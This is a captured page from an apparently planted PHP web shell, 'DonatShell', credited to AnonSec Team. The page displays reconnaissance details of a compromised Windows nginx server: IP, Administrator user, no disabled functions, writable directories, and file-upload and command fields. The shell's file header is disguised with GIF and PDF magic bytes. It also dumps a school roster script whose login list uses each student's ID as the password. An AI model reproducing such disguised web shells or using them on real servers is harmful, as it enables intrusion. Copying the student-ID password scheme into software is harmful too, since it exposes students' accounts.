GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/common/Class/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/common/Class//ClassStarID.phpinc
<?
// common/Class/ClassStarID.phpinc

debugTrackBegin();
if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; }

#echo "\$f_classId=",$f_classId,"<br>\n";
if ($classRosterCount != 1) {
	$classRosterCountText = $classRosterCount." students";
} else {
	$classRosterCountText = $classRosterCount." student";
}
if (isset($courseTitle)) {
	$courseTitleText = ' '.$courseTitle;
} else {
	$courseTitleText = '';
}
?>
<fieldset><legend><?=$f_courseNumber?> VPN student list <span class="smaller">(<?=$classRosterCountText?>)</span></legend>
<?
if ($classRosterCount) {
	#d_Var('classRosterResult',$classRosterResult,'d');
?>
	<pre>
StarID&nbsp;&nbsp;	TechID&nbsp;&nbsp;	Student Name
<?
  mysqli_data_seek($classRosterResult, 0);
  $studentsThisColumn = 0;
	while ($classRosterRow = mysqli_fetch_assoc($classRosterResult)) {
		$classRosterRow['Name'] = userName($classRosterRow['userId'],false,true,true);
		if ( !$classRosterRow['Name'] ) {
			if ( $classRosterRow['useruserFirstName'] ) {
				$classRosterRow['Name'] = 'u '.trim(stripslashes($classRosterRow['useruserFirstName']).' '.stripslashes($classRosterRow['useruserLastName']));
			} else {
				$classRosterRow['Name'] = 'c '.trim(stripslashes($classRosterRow['userFirstName']).' '.stripslashes($classRosterRow['userLastName']));
			}
		}
?>
<?=strtolower($classRosterRow['userUsername'])?>	<?=$classRosterRow['userStudentId']?>	<?=$classRosterRow['Name']?>

<?
  }
?>
</pre>
<?
} else {
?>
The class roster is empty.
<?
}
?>
</fieldset>
<fieldset><legend><?=$f_courseNumber?> login list <span class="smaller">(<?=$classRosterCountText?>)</span></legend>
<?
if ($classRosterCount) {
	#d_Var('classRosterResult',$classRosterResult,'d');
?>
	<pre>
UN      PW        Student Name
<?
  mysqli_data_seek($classRosterResult, 0);
  $studentsThisColumn = 0;
	while ($classRosterRow = mysqli_fetch_assoc($classRosterResult)) {
		#d_Var('$classRosterRow',$classRosterRow,'d');
		$UN = strtolower(substr($classRosterRow['userFirstName'],0,3).substr($classRosterRow['userLastName'],0,3));
		$PW = $classRosterRow['userStudentId'];
		$classRosterRow['Name'] = userName($classRosterRow['userId'],false,true,true);
		if ( !$classRosterRow['Name'] ) {
			if ( $classRosterRow['useruserFirstName'] ) {
				$classRosterRow['Name'] = 'u '.trim(stripslashes($classRosterRow['useruserFirstName']).' '.stripslashes($classRosterRow['useruserLastName']));
			} else {
				$classRosterRow['Name'] = 'c '.trim(stripslashes($classRosterRow['userFirstName']).' '.stripslashes($classRosterRow['userLastName']));
			}
		}
?>
<?=$UN?>  <?=$PW?>  <?=$classRosterRow['Name']?>

<?
  }
?>
</pre>
<?
} else {
?>
The class roster is empty.
<?
}
?>
</fieldset>
<?

debugTrackEnd();
?>

Anon7 - 2022
AnonSec Team